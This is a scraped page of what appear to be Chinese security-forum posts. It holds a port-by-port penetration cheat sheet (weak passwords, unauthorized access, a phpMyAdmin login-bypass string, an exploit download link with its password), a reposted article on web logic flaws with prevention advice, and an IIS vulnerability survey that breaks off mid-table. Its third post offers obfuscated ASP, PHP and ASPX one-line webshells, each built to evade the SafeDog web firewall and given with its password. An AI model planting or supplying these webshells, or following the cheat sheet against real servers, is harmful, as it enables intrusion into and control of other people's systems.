中国科学院某处jboss应用漏洞Websphere
默认端口:908*;第一个应用就是9080,第二个就是9081;控制台9090
攻击方式:
爆破:弱口令(控制台)
任意文件泄漏:(CVE-2014-0823)
Java反序列化
案例分享:
中国电信某通用型业务系统(Websphere)GetShell漏洞
大汉网络有限公司远程命令执行漏洞(WebSphere案例)GlassFish
默认端口:http 8080;IIOP 3700;控制台4848
攻击方式:
爆破:弱口令(对于控制台)
任意文件读取:
认证绕过:
案例分享:
应用服务器glassfish存在通用任意文件读取漏洞
Oracle GlassFish Server认证绕过Jenkins
默认端口:8080、8089
攻击方式:
爆破:弱口令(默认管理员)
未授权访问:
反序列化:
案例分享:
酷6Jenkins系统未授权访问可执行系统命令Resin
默认端口:8080
攻击方式:
目录遍历
远程文件读取
案例分享:
爱奇艺Resin配置漏洞
Resin漏洞利用案例之目录遍历/以金蝶某系统为例Jetty
默认端口:8080
攻击方式:
远程共享缓冲区溢出Lotus
影响的都是一些大型的企业,特别需要注意,经过以前的测试发现弱口令这个问题经常都存在,可能是很多管理员不知道如何去修改(不要打我)。
默认端口:1352
攻击方式:
爆破:弱口令(admin password)控制台
信息泄露
跨站脚本攻击
案例分享:
Lotus Domino WebMail一处越权访问
中电投集团某系统弱口令直达内网涉及/OA系统/内部邮箱/财务系统/人力资源系统
中国某大型金融机构地方业务弱口令导致数万商户信息泄露&访问Lotus Domino后台数据库服务端口渗透
针对所有的数据库攻击方式都存在SQL注入,这里先提出来在下面就不一一写了免得大家说我占篇幅;当然不同的数据库注入技巧可能不一样,特别是NoSQL与传统的SQL数据库不太一样。但是这不是本文需要介绍的重点,后面有时间会写一篇不同数据库的渗透技巧。MySQL数据库
默认端口:3306
攻击方式:
爆破:弱口令
身份认证漏洞:CVE-2012-2122
拒绝服务攻击:利用sql语句是服务器进行死循环打死服务器
Phpmyadmin万能密码绕过:用户名:‘localhost’@’@”  密码任意
案例分享:
漏洞分享
和讯网某站点存在mysql注入漏洞
MySQL提权总结MSSQL数据库
默认端口:1433(Server 数据库服务)、1434(Monitor 数据库监控)
攻击方式:
爆破:弱口令/使用系统用户
案例分享:
MSSQL注射总结
上海安脉综合管理系统mssql注射漏洞
解密MSSQL连接数据库密码
从攻击MSSQL到提权: 使用msf针对mssql的一次完整渗透Oracle数据库
默认端口:1521(数据库端口)、1158(Oracle EMCTL端口)、8080(Oracle XDB数据库)、210(Oracle XDB FTP服务)
攻击方式:
爆破:弱口令
注入攻击;
漏洞攻击;
案例分享:
Oracle盲注结合XXE漏洞远程获取数据PostgreSQL数据库
PostgreSQL是一种特性非常齐全的自由软件的对象–关系型数据库管理系统,可以说是目前世界上最先进,功能最强大的自由数据库管理系统。包括我们kali系统中msf也使用这个数据库;浅谈postgresql数据库攻击技术  大部分关于它的攻击依旧是sql注入,所以注入才是数据库不变的话题。
默认端口:5432
攻击方式:
爆破:弱口令:postgres postgres
缓冲区溢出:CVE-2014-2669
案例分享:
Hacking postgresql
关于postgresql的那些事MongoDB数据库
MongoDB:NoSQL数据库;攻击方法与其他数据库类似;关于它的安全讲解:请参考
默认端口:27017
攻击方式:
爆破:弱口令
未授权访问;github有攻击代码;请点击
案例分享:
MongoDB phpMoAdmin远程代码执行
搜狐MongoDB未授权访问
新浪微米未授权访问
解决MongoDB各种隐患问题Redis数据库
redis:是一个开源的使用c语言写的,支持网络、可基于内存亦可持久化的日志型、key-value数据库。关于这个数据库这两年还是很火的,暴露出来的问题也很多。特别是前段时间暴露的未授权访问。Exp:https://yunpan.cn/cYjzHxawFpyVt  访问密码 e547
默认端口:6379
攻击方式:
爆破:弱口令
未授权访问+配合ssh key提权;
案例分享:
中国铁建网redis+ssh-keygen免认证登录SysBase数据库
默认端口:服务端口5000;监听端口4100;备份端口:4200
攻击方式:
爆破:弱口令
命令注入:
案例分享:
广西自考信息系统Sybase数据库注入
Sybase EAServer命令注入漏洞DB2数据库
默认端口:5000
攻击方式:
安全限制绕过:成功后可执行未授权操作(CVE-2015-1922)
案例分享:
哈尔滨银行主站DB2注入
总结一下:对于数据库,我们得知端口很多时候可以帮助我们去渗透,比如得知mysql的 数据库,我们就可以使用SQL注入进行mof、udf等方式提权;如果是mssql我们就可以使用xp_cmdshell来进行提权;如果是其它的数据 库,我们也可以采用对应的方式;比如各大数据库对应它们的默认口令,版本对应的漏洞!
顺便提一下:很多时候银行企业采用的都是oracle、db2等大型数据库;邮件服务端口渗透SMTP协议
smtp:邮件协议,在linux中默认开启这个服务,可以向对方发送钓鱼邮件!
默认端口:25(smtp)、465(smtps)
攻击方式:
爆破:弱口令
未授权访问
案例分享:
腾讯邮箱smtp注册时间限制绕过漏洞
邮件伪造详解
qq邮箱伪造发件地址,容易被钓鱼利用
众多厂商邮件系统配置不当可伪造邮件人POP3协议
默认端口:109(POP2)、110(POP3)、995(POP3S)
攻击方式:
爆破;弱口令
未授权访问;
案例分享:
中国联通沃邮箱等部分Android客户端免密码登陆(可获取任意联通用户pop3密码)
中航信邮箱密码泄漏及VPN账号和大量邮箱弱口令导致可内网漫游拿到域控IMAP协议
默认端口:143(imap)、993(imaps)
攻击方式:
爆破:弱口令
配置不当
案例分享:
163邮箱二次验证饶过缺陷
南方周末邮件服务器任意文件读取漏洞网络常见协议端口渗透DNS服务
默认端口:53
攻击方式:
区域传输漏洞
见2中的总结
案例分享:
全球Top1000Websites中存在DNS区域传送漏洞的网站列表
团购王某站DNS域传送漏洞
DNS泛解析与内容投毒DHCP服务
默认端口:67&68、546(DHCP Failover做双机热备的)
攻击方式:
DHCP劫持;
见2中总结
案例分享:
流氓DHCP服务器内网攻击测试SNMP协议
默认端口:161
攻击方式:
爆破:弱口令
案例分享:
snmp弱口令引起的信息泄漏
基于snmp的反射攻击的理论及其实现
华为某服务器SNMP弱口令其他端口渗透Hadoop文件服务
默认端口:请参考
案例分享:
Apache Hadoop远程命令执行
新浪漏洞系列第六弹–大量hadoop应用对外访问Zookeeper服务
zookeeper:分布式的,开放源码的分布式应用程序协调服务;提供功能包括:配置维护、域名服务、分布式同步、组服务等。详情请参考百度百科
默认端口:2181
攻击方式:
未授权访问;
案例分享:
zookeeper未授权访问漏洞
网上关于这方面的案例暂时不多,但是对于大数据逐渐泛滥的今天,这些漏洞未来会在乌云上出现一大波!Zabbix服务
zabbix:基于Web界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。监视各种网络参数,保证服务器系统的安全运营。
默认端口:8069
攻击方式:
远程命令执行:
案例分享:
当渗透遇到zabbix–小谈zabbix安全
Zabbix的前台SQL注射漏洞利用
网易zabbix运维不当,导致任意命令执行。(可提权、可内网渗透)elasticsearch服务
elasticsearch:请百度(因为我觉得我解释不清楚)
默认端口:9200()、9300()
攻击方式:
未授权访问;
远程命令执行;
文件遍历;
低版本webshell植入;
案例分享:
ElasticSearch 远程代码执行漏洞
elasticsearch 漏洞利用工具memcache服务
默认端口:11211
案例分享:
Memcache安全配置
memcache 未授权访问漏洞Linux R服务
R服务:TCP端口512,513和514为著名的rlogin提供服务。在系统中被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts + +)。
默认端口:512(remote process execution);513(remote login a la
telnet);514(cmd)
攻击方式:
使用rlogin直接登录对方系统;RMI
RMI:我们使用这两个端口很少的原因是因为必须是java,而且rmi穿越防火墙并不好穿越;这里我不会去涉及其他的东西,这里提出RMI只是因为在前段时间的java反序列化中,我们的小伙伴Bird写过一个weblogic利用工具,里面涉及到了RMI的一些东西,在有的时候使用socket不能成功时,我们可以使用RMI方式来进行利用;
默认端口:1090()、1099()
攻击方式:
远程命令执行(java反序列化,调用rmi方式执行命令)
这就是RMI的魅力了!
工具下载:请点我Rsync服务
Rsync:类UNIX系统下的数据备份工具(remote sync),属于增量备份;关于它的功能,大家自行百度百科吧,其实上面很多大家也看到了说是端口渗透,其实就是端口对应服务的渗透,服务一般出错就在配置或者版本问题上,rsync也不例外。Rsync默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。
默认端口:873
攻击方式:
未授权访问;
本地提权:rsync默认以root运行,利用rsync上传一个文件,只要这个文件具有s权限,我们执行我们的攻击脚本就可以具有root权限。详细请参考参考二
案例分享:
搜狐几处rsync未授权访问Socket代理
默认端口:1080
Socket代理针对代理来说没有什么漏洞,一般只是在渗透过程中作为我们的代理,进入内网,或者渗透域和林的时候有帮助。这里不做过多描述,但是可以尝试爆破一下代理的用户名和密码,万一运气好能登录,不也~~~~
案例分享:
利用php socket5代理渗透内网0x02 总结两句图解端口渗透端口号端口说明攻击技巧21/22/69ftp/tftp:文件传输协议爆破
嗅探
溢出;后门22ssh:远程连接爆破
OpenSSH28个退格23telnet:远程连接爆破
嗅探25smtp:邮件服务邮件伪造53DNS:域名系统DNS区域传输
DNS劫持
DNS缓存投毒
DNS欺骗
深度利用:利用DNS隧道技术刺透防火墙67/68dhcp劫持
欺骗110pop3爆破139samba爆破
未授权访问
远程代码执行143imap爆破161snmp爆破389ldap注入攻击
未授权访问512/513/514linux r直接使用rlogin873rsync未授权访问1080socket爆破:进行内网渗透1352lotus爆破:弱口令
信息泄漏:源代码1433mssql爆破:使用系统用户登录
注入攻击1521oracle爆破:TNS
注入攻击2049nfs配置不当2181zookeeper未授权访问3306mysql爆破
拒绝服务
注入3389rdp爆破
Shift后门4848glassfish爆破:控制台弱口令
认证绕过5000sybase/DB2爆破
注入5432postgresql缓冲区溢出
注入攻击
爆破:弱口令5632pcanywhere拒绝服务
代码执行5900vnc爆破:弱口令
认证绕过6379redis未授权访问
爆破:弱口令7001weblogicJava反序列化
控制台弱口令
控制台部署webshell80/443/8080web常见web攻击
控制台爆破
对应服务器版本漏洞8069zabbix远程命令执行9090websphere控制台爆破:控制台弱口令
Java反序列9200/9300elasticsearch远程代码执行11211memcacache未授权访问27017mongodb爆破
未授权访问

Web安全测试中常见逻辑漏洞解析

Web安全渗透main 发表了文章 • 0 个评论 • 37 次浏览 • 2019-01-13 14:33 • 来自相关话题

看到一篇关于逻辑漏洞解析的文章,分享给大家:
 
具体分类:
 
一:订单金额任意修改解析
 很多中小型的购物网站都存在这个漏洞。在提交订单的时候抓取数据包或者直接修改前端代码,然后对订单的金额任意修改。
如下图所示:


经常见到的参数大多为:


rmb
value
amount
cash
fee
money
num


 
关于支付的逻辑漏洞这一块还有很多种思路,比如相同价格增加订单数量,相同订单数量减少产品价格,订单价格设定为负数等等。
 
预防思路: 1.订单需要多重效验,如下图所演示。

 
2. 订单数值较大时需要人工审核订单信息,如下图所演示。

 
3. 我只是提到两个非常简单的预防思路,第二个甚至还有一些不足之处。这里需要根据业务环境的不同总结出自己的预防方式,最好咨询专门的网络安全公司。二:验证码回传解析: 这个漏洞主要是发生在前端验证处,并且经常发生的位置在于:

1.账号密码找回
2.账号注册
3.支付订单等


验证码主要发送途径:

1.邮箱邮件
2.手机短信


其运行机制如下图所示:

黑客只需要抓取Response数据包便知道验证码是多少。
 
预防思路:
1.response数据内不包含验证码,验证方式主要采取后端验证,但是缺点是服务器的运算压力也会随之增加。
 
2.如果要进行前端验证的话也可以,但是需要进行加密。当然,这个流程图还有一些安全缺陷,需要根据公司业务的不同而进行更改。

 
 
三.未进行登陆凭证验证解析:
 
有些业务的接口,因为缺少了对用户的登陆凭证的效验或者是验证存在缺陷,导致黑客可以未经授权访问这些敏感信息甚至是越权操作。
  常见案例:
1. 某电商后台主页面,直接在管理员web路径后面输入main.php之类的即可进入。

 
2. 某航空公司订单ID枚举
 
3. 某电子认证中心敏感文件下载
 
4.某站越权操作及缺陷,其主要原因是没对ID参数做cookie验证导致。
 
5. 实际上还有很多案例,这里就不一一例举了,但是他们都存在一个共同的特性,就是没有对用户的登陆凭证进行效验,如下图为例。

 
预防思路: 对敏感数据存在的接口和页面做cookie,ssid,token或者其它验证,如下图所示。

 
 
四:接口无限制枚举解析:
有些关键性的接口因为没有做验证或者其它预防机制,容易遭到枚举攻击。
  常见案例:
1. 某电商登陆接口无验证导致撞库

 
 
2. 某招聘网验证码无限制枚举
 
 
3. 某快递公司优惠券枚举
 
4. 某电商会员卡卡号枚举
5. 某超市注册用户信息获取

 
预防思路: 1. 在输入接口设置验证,如token,验证码等。

如果设定验证码,最好不要单纯的采取一个前端验证,最好选择后端验证。
如果设定token,请确保每个token只能采用一次,并且对token设定时间参数。

2. 注册界面的接口不要返回太多敏感信息,以防遭到黑客制作枚举字典。
3. 验证码请不要以短数字来甚至,最好是以字母加数字进行组合,并且验证码需要设定时间期限。
4. 优惠券,VIP卡号请尽量不要存在规律性和简短性,并且优惠券最好是以数字加字母进行组合。
5. 以上这是部分个人建议,实际方案需要参考业务的具体情况。五:cookie设计存在缺陷解析:
这里需要对其详细的说一下。我们先一个一个来吧。
Cookie的效验值过于简单。有些web对于cookie的生成过于单一或者简单,导致黑客可以对cookie的效验值进行一个枚举,如下图所示

根据上图,我们可以分析出,这家网站对于cookie的效验只单纯的采用了一组数字,并且数值为常量,不会改变,这样非常容易遭到黑客的枚举。甚至有一些网站做的更简单,直接以用户名,邮箱号或者用户ID等来作为cookie的判断标准。
  2. cookie设置存在被盗风险
有很多时候,如果一个用户的cookie被盗取,就算用户怎么修改账号和密码,那段cookie一样有效。详情可以参考《BlackHat(世界黑帽大会)官方APP出现两个逻辑漏洞》。
其原理如下:

国内大部分厂商都不会把这个地方当作安全漏洞来处理,他们认为这个漏洞的利用条件是黑客必须要大批量获取到用户的cookie。虽然事实如此,但是这个也是一个安全隐患。
  3.用户的cookie数据加密应严格使用标准加密算法,并注意密钥管理。
有一些厂商为了图方便,没有对用户的cookie做太多的加密工作,仅仅是单纯的做一个静态加密就完事了。我之前就碰到一个,可以为大家还原一下当时的场景。

当时我看到cookie中有个access token参数,看到value后面是两个等号,习惯性的给丢去base64解码里面,发现解出来后是我的用户名。因此只要知道一个人的用户名就可以伪造对方的cookie,登陆他人账户。
  4.还有多个案例不再做重复说明,大家可以深入研究一下cookie中的逻辑漏洞。但是cookie中的漏洞大多都是属于一个越权漏洞。越权漏洞又分为平行越权,垂直越权和交叉越权。

平行越权:权限类型不变,权限ID改变
垂直越权:权限ID不变,权限类型改变
交叉越权:即改变ID,也改变权限

如下图所示:

 
预防思路: 1.cookie中设定多个验证,比如自如APP的cookie中,需要sign和ssid两个参数配对,才能返回数据。
2.用户的cookie数据加密应严格使用标准加密算法,并注意密钥管理。
3.用户的cookie的生成过程中最好带入用户的密码,一旦密码改变,cookie的值也会改变。
4.cookie中设定session参数,以防cookie可以长时间生效。
5.还有很多方法,不再一一例举,请根据业务不同而思考。
 
 
六:找回密码存在设计缺陷解析:
  1.auth设计缺陷
经常研究逻辑漏洞的人可能会对以下URL很熟悉[code]www.xxx.com/resetpassword.php?id=MD5
[/code]
用户修改密码时,邮箱中会收到一个含有auth的链接,在有效期内用户点击链接,即可进入重置密码环节。而大部分网站对于auth的生成都是采用rand()函数,那么这里就存在一个问题了,Windows环境下rand()最大值为32768,所以这个auth的值是可以被枚举的。
  如下面这个代码可以对auth的值做一个字典。

 
然后重置某个账号,并且对重置链接内的auth进行枚举
 
整个漏洞的运作的流程图如下:
 
2.对response做验证 这个漏洞经常出现在APP中,其主要原因是对于重置密码的的验证是看response数据包,由于之前的案例没有截图,只能画个流程图给大家演示一下。

3.《密码找回逻辑漏洞总结》这篇文章很全面的总结了密码找回漏洞的几个具体思路和分析,这里我就不再继续滚轮子了。
 
预防思路: 1.严格使用标准加密算法,并注意密钥管理。
2.在重置密码的链接上请带入多个安全的验证参数。七:单纯读取内存值数据来当作用户凭证解析:
实际上这个应该算作一个软件的漏洞,但是因为和web服务器相关,所以也当作WEB的逻辑漏洞来处理了。最能当作例子是《腾讯QQ存在高危漏洞可读取并下载任意用户离线文件(泄漏敏感信息)》这个漏洞,但是我相信这种奇葩的漏洞不一定只有腾讯才有,只是还没人去检测罢了。
产生这个漏洞的主要原因是程序在确定一个用户的登陆凭证的时候主要是依靠内存值中的某个value来进行确认,而不是cookie。但是内存值是可以更改和查看的。
其流程图如下:

 
预防思路: 1. 走服务器端的数据最好做cookie验证。
2. 我不反对直接在进程中确定用户的登陆凭证,但是请对进程进行保护,或者对进程中的value做加密处理。
 
-------转载:https://www.freebuf.com/vuls/112339.html#
*文章原创作者: ArthurKiller@漏洞盒子安全研究团队,来自FreeBuf黑客与极客(FreeBuf.COM) 查看全部
看到一篇关于逻辑漏洞解析的文章,分享给大家:
 
具体分类:
 
一:订单金额任意修改解析
 很多中小型的购物网站都存在这个漏洞。在提交订单的时候抓取数据包或者直接修改前端代码,然后对订单的金额任意修改。
如下图所示:


经常见到的参数大多为:



rmb
value
amount
cash
fee
money
num


 
关于支付的逻辑漏洞这一块还有很多种思路,比如相同价格增加订单数量相同订单数量减少产品价格,订单价格设定为负数等等。
 
预防思路: 1.订单需要多重效验,如下图所演示。

 
2. 订单数值较大时需要人工审核订单信息,如下图所演示。

 
3. 我只是提到两个非常简单的预防思路,第二个甚至还有一些不足之处。这里需要根据业务环境的不同总结出自己的预防方式,最好咨询专门的网络安全公司。二:验证码回传解析: 这个漏洞主要是发生在前端验证处,并且经常发生的位置在于:


1.账号密码找回
2.账号注册
3.支付订单等



验证码主要发送途径:


1.邮箱邮件
2.手机短信



其运行机制如下图所示:

黑客只需要抓取Response数据包便知道验证码是多少。
 
预防思路:
1.response数据内不包含验证码,验证方式主要采取后端验证,但是缺点是服务器的运算压力也会随之增加。
 
2.如果要进行前端验证的话也可以,但是需要进行加密。当然,这个流程图还有一些安全缺陷,需要根据公司业务的不同而进行更改。

 
 
三.未进行登陆凭证验证解析:
 
有些业务的接口,因为缺少了对用户的登陆凭证的效验或者是验证存在缺陷,导致黑客可以未经授权访问这些敏感信息甚至是越权操作。
  常见案例:
1. 某电商后台主页面,直接在管理员web路径后面输入main.php之类的即可进入。

 
2. 某航空公司订单ID枚举
 
3. 某电子认证中心敏感文件下载
 
4.某站越权操作及缺陷,其主要原因是没对ID参数做cookie验证导致。
 
5. 实际上还有很多案例,这里就不一一例举了,但是他们都存在一个共同的特性,就是没有对用户的登陆凭证进行效验,如下图为例。

 
预防思路: 对敏感数据存在的接口和页面做cookie,ssid,token或者其它验证,如下图所示。

 
 
四:接口无限制枚举解析:
有些关键性的接口因为没有做验证或者其它预防机制,容易遭到枚举攻击。
  常见案例:
1. 某电商登陆接口无验证导致撞库

 
 
2. 某招聘网验证码无限制枚举
 
 
3. 某快递公司优惠券枚举
 
4. 某电商会员卡卡号枚举
5. 某超市注册用户信息获取

 
预防思路: 1. 在输入接口设置验证,如token,验证码等。


如果设定验证码,最好不要单纯的采取一个前端验证,最好选择后端验证。
如果设定token,请确保每个token只能采用一次,并且对token设定时间参数。


2. 注册界面的接口不要返回太多敏感信息,以防遭到黑客制作枚举字典。
3. 验证码请不要以短数字来甚至,最好是以字母加数字进行组合,并且验证码需要设定时间期限。
4. 优惠券,VIP卡号请尽量不要存在规律性和简短性,并且优惠券最好是以数字加字母进行组合。
5. 以上这是部分个人建议,实际方案需要参考业务的具体情况。五:cookie设计存在缺陷解析:
这里需要对其详细的说一下。我们先一个一个来吧。
  1. Cookie的效验值过于简单。有些web对于cookie的生成过于单一或者简单,导致黑客可以对cookie的效验值进行一个枚举,如下图所示


根据上图,我们可以分析出,这家网站对于cookie的效验只单纯的采用了一组数字,并且数值为常量,不会改变,这样非常容易遭到黑客的枚举。甚至有一些网站做的更简单,直接以用户名,邮箱号或者用户ID等来作为cookie的判断标准。
  2. cookie设置存在被盗风险
有很多时候,如果一个用户的cookie被盗取,就算用户怎么修改账号和密码,那段cookie一样有效。详情可以参考《BlackHat(世界黑帽大会)官方APP出现两个逻辑漏洞》
其原理如下:

国内大部分厂商都不会把这个地方当作安全漏洞来处理,他们认为这个漏洞的利用条件是黑客必须要大批量获取到用户的cookie。虽然事实如此,但是这个也是一个安全隐患。
  3.用户的cookie数据加密应严格使用标准加密算法,并注意密钥管理。
有一些厂商为了图方便,没有对用户的cookie做太多的加密工作,仅仅是单纯的做一个静态加密就完事了。我之前就碰到一个,可以为大家还原一下当时的场景。

当时我看到cookie中有个access token参数,看到value后面是两个等号,习惯性的给丢去base64解码里面,发现解出来后是我的用户名。因此只要知道一个人的用户名就可以伪造对方的cookie,登陆他人账户。
  4.还有多个案例不再做重复说明,大家可以深入研究一下cookie中的逻辑漏洞。但是cookie中的漏洞大多都是属于一个越权漏洞。越权漏洞又分为平行越权,垂直越权和交叉越权。


平行越权:权限类型不变,权限ID改变
垂直越权:权限ID不变,权限类型改变
交叉越权:即改变ID,也改变权限


如下图所示:

 
预防思路: 1.cookie中设定多个验证,比如自如APP的cookie中,需要sign和ssid两个参数配对,才能返回数据。
2.用户的cookie数据加密应严格使用标准加密算法,并注意密钥管理。
3.用户的cookie的生成过程中最好带入用户的密码,一旦密码改变,cookie的值也会改变。
4.cookie中设定session参数,以防cookie可以长时间生效。
5.还有很多方法,不再一一例举,请根据业务不同而思考。
 
 
六:找回密码存在设计缺陷解析:
  1.auth设计缺陷
经常研究逻辑漏洞的人可能会对以下URL很熟悉
[code]www.xxx.com/resetpassword.php?id=MD5
[/code]
用户修改密码时,邮箱中会收到一个含有auth的链接,在有效期内用户点击链接,即可进入重置密码环节。而大部分网站对于auth的生成都是采用rand()函数,那么这里就存在一个问题了,Windows环境下rand()最大值为32768,所以这个auth的值是可以被枚举的。
  如下面这个代码可以对auth的值做一个字典。

 
然后重置某个账号,并且对重置链接内的auth进行枚举
 
整个漏洞的运作的流程图如下:
 
2.对response做验证 这个漏洞经常出现在APP中,其主要原因是对于重置密码的的验证是看response数据包,由于之前的案例没有截图,只能画个流程图给大家演示一下。

3.《密码找回逻辑漏洞总结》这篇文章很全面的总结了密码找回漏洞的几个具体思路和分析,这里我就不再继续滚轮子了。
 
预防思路: 1.严格使用标准加密算法,并注意密钥管理。
2.在重置密码的链接上请带入多个安全的验证参数。七:单纯读取内存值数据来当作用户凭证解析:
实际上这个应该算作一个软件的漏洞,但是因为和web服务器相关,所以也当作WEB的逻辑漏洞来处理了。最能当作例子是《腾讯QQ存在高危漏洞可读取并下载任意用户离线文件(泄漏敏感信息)》这个漏洞,但是我相信这种奇葩的漏洞不一定只有腾讯才有,只是还没人去检测罢了。
产生这个漏洞的主要原因是程序在确定一个用户的登陆凭证的时候主要是依靠内存值中的某个value来进行确认,而不是cookie。但是内存值是可以更改和查看的。
其流程图如下:

 
预防思路: 1. 走服务器端的数据最好做cookie验证。
2. 我不反对直接在进程中确定用户的登陆凭证,但是请对进程进行保护,或者对进程中的value做加密处理。
 
-------转载:https://www.freebuf.com/vuls/112339.html#
*文章原创作者: ArthurKiller@漏洞盒子安全研究团队,来自FreeBuf黑客与极客(FreeBuf.COM)

过狗一句话

Web安全渗透sq_smile 发表了文章 • 0 个评论 • 28 次浏览 • 2019-01-10 11:12 • 来自相关话题

前几天自己找的变性的过狗一句话,希望能帮到大家。
asp:
       <%Y=request("x")%> <%execute(Y)%>    密码:x
           <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>   密码:sz
           <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>      密码:-7
php:
         <!--?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?--> 

           <!--?php $lang = (string)key($_POST);$lang($_POST['sz']); ?--> 

           <!--?php $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);?--> 

           <!--?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["sz"]); ?-->    前几个密码都是:sz
           <!--?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?--> 
密码:-7
aspx的 过狗效果不怎么样—不过我认为能支持aspx 百分之八九十支持asp,
<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>     密码:-7
<%@ Page Language="Jscript"%><%eval(Request.Item["sz"],"unsafe");%>    密码:sz
 
<script type="text/javascript" language="C#">// <![CDATA[  
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");    
// ]]></script>    密码:webadmin
  查看全部
前几天自己找的变性的过狗一句话,希望能帮到大家。
asp:
       <%Y=request("x")%> <%execute(Y)%>    密码:x
           <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>   密码:sz
           <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>      密码:-7
php:
         <!--?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?--> 

           <!--?php $lang = (string)key($_POST);$lang($_POST['sz']); ?--> 

           <!--?php $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);?--> 

           <!--?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["sz"]); ?-->    前几个密码都是:sz
           <!--?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?--> 
密码:-7
aspx的 过狗效果不怎么样—不过我认为能支持aspx 百分之八九十支持asp,
<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>     密码:-7
<%@ Page Language="Jscript"%><%eval(Request.Item["sz"],"unsafe");%>    密码:sz
 
<script type="text/javascript" language="C#">// <![CDATA[  
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");    
// ]]></script>    密码:webadmin
 

那些年让我们心惊胆战的IIS漏洞

Web安全渗透sq_smile 发表了文章 • 0 个评论 • 22 次浏览 • 2019-01-08 21:20 • 来自相关话题

本文转自安全脉搏,为千里目实验室所写。
原文链接:https://www.secpulse.com/archives/82410.html​ 
一、 全球第三大网络服务器
Internet Information Services(IIS,以前称为Internet Information Server)互联网信息服务是Microsoft公司提供的可扩展Web服务器,支持HTTP,HTTP/2,HTTPS,FTP,FTPS,SMTP和NNTP等。起初用于Windows NT系列,随后内置在Windows 2000、Windows XP Professional、Windows Server 2003和后续版本一起发行。IIS目前只适用于Windows系统,不适用于其他操作系统。
根据Netcraft在2018年9月的最新全球Web服务器报告显示,Microsoft IIS依旧以9.57%的比例占据全球第三大最繁忙服务器,落后于Apache 34.07%和Nginx 25.45%。目前流行的Windows版本都默认安装IIS服务,但同时IIS的安全性一直被业内诟病,一旦IIS出现高危漏洞,将会出现范围广、影响深的特点。
 
目前IIS一共发行12个版本,从IIS 1.0版本至IIS 10.0版本,IIS 1.0-4.0已经基本退出市场,IIS 5.0-10.0是Web市场主要使用的网站服务器。随着Windows版本发布和不断更新,IIS自身的安全性也有了较大的提升。在2005-2018年期间,IIS漏洞呈现逐年减少的趋势,同时也说明了IIS漏洞POC公布越来越少、漏洞挖掘的难度也在提升。
 
IIS 版本
Win版本
IIS全球装机数量
受影响漏洞数量
IIS 1.0
Win NT 3.51
0
未统计
IIS 2.0
Win NT 4.0
0
未统计
IIS 3.0
Win NT 4.0 Sp3
0
未统计
IIS 4.0
Win NT 4.0选项包
0
未统计
IIS 5.0
Windows 2000
46,078
10个
IIS 5.1
Windows XP 系列
29,825
16个
IIS 6.0
Win 2003和Win XP Pro x64
620,360
21个
IIS 7.0
Win 2008、 Vista全系列
276,736
11个
IIS 7.5
Win 7和Win 2008 R2
3,970,245
12个
IIS 8.0
Win 8和Win 2012
344,734
4个
IIS 8.5
Win 8.1和Win 2012 R2
2,153,546
4个
IIS 10.0
Win 10和Win 2016
1,086,887
2个
 
从上述IIS漏洞统计表格可以看出,IIS 7.5、IIS 8.5和IIS 10.0是目前全球使用最多的三款IIS版本,分别对应受影响漏洞12个、4个和2个,呈现受影响漏洞数量递减的趋势。同时,在历年的IIS版本漏洞中,IIS 6.0、IIS 5.1、IIS 7.5和IIS 7.0受影响的漏洞数居前四位。
 二、 IIS漏洞分析
千里目实验室针对IIS近十几年(2005年以后)的35个漏洞进行和整理和分析,IIS漏洞主要分布在缓冲区溢出、认证绕过、DOS拒绝服务、代码执行和信息泄露,其中以MS15-034远程代码执行漏洞最为严重。
 
 
 
 
IIS漏洞类型
远程漏洞
本地漏洞
数量
缓冲区溢出
7
0
7
认证绕过
7
0
7
拒绝服务
5
0
